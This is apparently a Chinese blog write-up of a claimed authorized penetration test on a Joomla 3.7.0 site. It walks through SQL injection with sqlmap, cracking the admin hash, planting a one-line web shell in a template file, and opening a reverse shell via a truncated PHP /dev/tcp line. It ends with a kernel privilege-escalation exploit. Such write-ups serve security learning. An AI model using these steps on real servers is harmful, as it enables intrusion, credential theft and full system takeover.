记一次对 Joomla CMS 渗透过程

​最近在一次对某外企进行渗透测试的过程中(已授权)成功突破内网,发现了一个Joomla CMS,想着把这个渗透过程和思路写下来,供大家参考,请大佬略过。。。


首先,对其进行扫描

记一次对 Joomla CMS 渗透过程

发现其版本为 Joomla 3.7.0

于是,搜索这个版本的漏洞,,,

记一次对 Joomla CMS 渗透过程

发现存在SQL注入漏洞,继续查看详情

记一次对 Joomla CMS 渗透过程

上sqlmap跑一波,成功爆库。。。

记一次对 Joomla CMS 渗透过程

接下来,爆表

记一次对 Joomla CMS 渗透过程

爆用户名密码

记一次对 Joomla CMS 渗透过程

在线跑了一下MD5,实在是跑不出来,接下来试试John破解

记一次对 Joomla CMS 渗透过程

成功破解,得到密码,登录后台,进入模板写入一句话,访问:

http://10.1.1.104/templates/protostar/shell.php

没有问题,菜刀连接

记一次对 Joomla CMS 渗透过程

查看权限,发现不是root

记一次对 Joomla CMS 渗透过程

接下来进行提权,首先我们查看系统版本,发现是Linux 4.4.0,查找一个这个版本的漏洞试了好几个都不行,发现这个可以

记一次对 Joomla CMS 渗透过程

好,我们上传exp

记一次对 Joomla CMS 渗透过程

提权、、、、菜刀不好用,写一个反弹PHP文件,反弹回来一个shell

记一次对 Joomla CMS 渗透过程

<code>& /dev/tcp/10.1.1.103/7777 0>&1'");?>/<code>


本地监听7777 然后访问:

http://10.1.1.104/templates/protostar/cmd.php

成功反弹shell

记一次对 Joomla CMS 渗透过程

接着继续提权、、、运行如下两个文件

<code>./compile.sh./doubleput/<code>
记一次对 Joomla CMS 渗透过程

OK,提权成功。。。


分享到:


相關文章: